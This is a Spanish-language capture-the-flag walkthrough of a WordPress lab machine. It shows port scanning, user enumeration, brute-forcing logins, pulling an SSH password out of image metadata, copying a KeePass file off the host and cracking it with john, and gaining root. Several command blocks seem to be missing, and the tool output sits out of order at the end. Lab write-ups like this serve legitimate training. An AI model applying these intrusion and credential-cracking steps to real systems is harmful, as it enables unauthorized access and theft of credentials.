Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 03:15 EDT
Nmap scan report for 192.168.5.29
Host is up (0.00081s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6.2
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:50:73:B2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.15 seconds
Veremos que tenemos un puerto 80 en el que posiblemente este alojada una pagina web, vamos a entrar dentro de la misma a ver que nos encontramos, entrando dentro ya de primeras si bajamos abajo del todo vemos que esta creado por wordpress por lo que vamos a ver si encontramos algunas credenciales con la herramienta wpscan.
wpscan
Info:
Vemos que hemos obtenido algunos nombre de usuarios, por lo que vamos a pontarnos una lista de usuarios de esta forma:
Credentials WordPress gill
users.txt
Tambien vamos a generar un diccionario de palabras de la propia pagina del wordpress a ver que encontramos.
Ahora vamos a tirar un ataque de fuerza bruta contra dichos usuarios y contraseñas.
Info:
Vemos que encontro una credenciales validas despues de un rato.
Vamos a probarlas llendonos al panel de administrador del wordpress de la siguiente forma.
Una vez que nos loguemos veremos que estaremos dentro, vamos a buscar un poco la forma de acceder a dicha maquina o algo por el estilo.
Escalate user gill
Si nos vamos a Media -> Library veremos una imagen que no aparece en la pagina de wordpress que seria esta de aqui.
Vamos a descargarnosla y ver que metadatos contiene ya que es bastante interesante.
Una vez que nos la hayamos descargado, haremos esto.
Info:
Vemos bastante informacion pero entre ella veremos lo siguiente:
Vemos lo que parece las credenciales del usuario gill por el SSH, vamos a probarlo.
SSH
Metemos como contraseña 59583hello y veremos que estamos dentro, por lo que leeremos la flag del usuario.
user.txt
Escalate Privileges
Si listamos la home del propio usuario gill veremos este archivo de aqui.
Vemos que es un archivo de KeePass por lo que vamos a pasarnoslo al host y vamos a crakear la contraseña en nuestro host.
Abriremos un servidor de python3 en la maquina victima.
En la maquina host nos lo descargaremos con la herramienta wget, una vez echo esto, haremos lo siguiente.
Info:
Veremos que hemos encontrado la contraseña de dicho archivo, por lo que vamos abrirlo y ver que contiene.
Metemos como contraseña porsiempre y veremos que estamos dentro, pero no veremos nada interesante dentro, si nos volvemos a la maquina victima y vemos la siguiente carpeta llamada keyfolder en la raiz, veremos que es la misma que la del keepass de la DB, por lo que algo tendra que ver con eso.
Vamos a probar a crear dichas carpetas en dicho archivo de la DB que encontramos en el keepass.
Veremos que no pasa nada, pero si los empezamos a crear por separado uno por uno eliminando el anterior y metiendo el nuevo, veremos que con el archivo llamado fracturedocean si funciona y veremos esto despues de haber esperado un poco.
Veremos que se nos ha creado un archivo llamado rootcreds.txt que si lo leemos veremos esto:
Vemos lo que parece ser las credenciales de root.
Metemos como contraseña imjustdrifting31 y veremos que estamos dentro.
ExifTool Version Number : 13.10
File Name : dblogo.png
Directory : .
File Size : 19 kB
File Modification Date/Time : 2021:02:24 09:46:01-05:00
File Access Date/Time : 2025:05:26 03:31:45-04:00
File Inode Change Date/Time : 2025:05:26 03:31:45-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 300
Image Height : 300
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Gamma : 2.2
Pixels Per Unit X : 2835
Pixels Per Unit Y : 2835
Pixel Units : meters
XMP Toolkit : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool : Adobe Photoshop CC 2018 (Windows)
Create Date : 2021:02:24 02:55:28+03:00
Metadata Date : 2021:02:24 02:55:28+03:00
Modify Date : 2021:02:24 02:55:28+03:00
Instance ID : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
Format : image/png
History Action : created, saved
History Instance ID : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /
Text Layer Name : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size : 300x300
Megapixels : 0.090
Text Layer Name : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text : ssh password is 59583hello of course it is lowercase maybe not :)
ssh gill@<IP>
F83FC7429857283616AE62F8B64143E6
-rwx------ 1 gill gill 2030 Feb 24 2021 keyfile.kdbx
python3 -m http.server
keepass2john keyfile.kdbx > hash.keep
john --wordlist=<WORDLIST> hash.keep
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre (keyfile)
1g 0:00:00:21 DONE (2025-05-26 03:37) 0.04646g/s 320.4p/s 320.4c/s 320.4C/s winston1..lollie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.